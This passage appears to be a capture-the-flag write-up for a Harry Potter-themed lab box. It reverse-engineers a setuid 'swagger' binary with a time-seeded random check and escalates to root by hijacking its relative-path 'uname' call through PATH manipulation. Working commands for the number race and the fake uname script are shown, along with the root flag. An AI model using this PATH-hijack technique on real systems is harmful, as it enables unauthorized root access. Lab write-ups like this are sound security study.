-rwsr-xr-x 1 root root        14328 Mar 27  2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root       113528 Oct  8  2020 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root       100760 Nov 23  2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic

Running it will prompt for a number and will tell you if the number you guessed was the one generated randomly.

hermonine@hogwartz-castle:/srv/time-turner$ ./swagger 
Guess my number: 12  
Nope, that is not what I was thinking
I was thinking of 1438938724
hermonine@hogwartz-castle:/srv/time-turner$ ./swagger 
Guess my number: 123456
Nope, that is not what I was thinking
I was thinking of 1160506623

Reverse Engineering

I downloaded the binary and analyzed it locally. Below is the pseudo C code of main():

int main(int arg0, int arg1) {
    srand(time(0x0));
    var_C = rand();
    printf("Guess my number: ");
    __isoc99_scanf(0xb8d);
    if (var_C == var_10) {
            impressive();
    }
    else {
            puts("Nope, that is not what I was thinking");
            printf("I was thinking of %d\n", var_C);
    }
    rdx = *0x28 ^ *0x28;
    if (rdx != 0x0) {
            rax = __stack_chk_fail();
    }
    else {
            rax = 0x0;
    }
    return rax;
}

It calls the impressive() function when the guessed numer is correct:

int impressive() {
    setregid(0x0, 0x0);
    setreuid(0x0, 0x0);
    puts("Nice use of the time-turner!");
    printf("This system architecture is ");
    fflush(*__TMC_END__);
    rax = system("uname -p");
    return rax;
}

Ultimately, we have to jump to the impressive() function which will execute uname -p as root (because of setregid and setreuid):

Proof of concept

Now, we can extract the expected number by running the program, and pipe the result to the program as input:

┌──(kali㉿kali)-[/data/Madeye_s_Castle/files]
└─$ echo 1234 | ./swagger | tr -dc '0-9' | ./swagger 
Guess my number: Nice use of the time-turner!
This system architecture is unknown

Hijacking uname

That’s nice because we know how to jump to the impressive() function. Now, we need to hijack the call to uname. We can do it easily as uname is called with a relative path.

hermonine@hogwartz-castle:/tmp$ cat > uname << EOF 
#!/bin/bash
cat /root/root.txt
EOF
hermonine@hogwartz-castle:/tmp$ chmod +x uname 
hermonine@hogwartz-castle:/tmp$ export PATH=/tmp:$PATH
hermonine@hogwartz-castle:/tmp$ echo 1234 | /srv/time-turner/swagger | tr -dc '0-9' | /srv/time-turner/swagger 
Guess my number: Nice use of the time-turner!
This system architecture is RME{M@rK-3veRy-hOur-0135d3f8ab9fd5bf}

Root flag: RME{M@rK-3veRy-hOur-0135d3f8ab9fd5bf}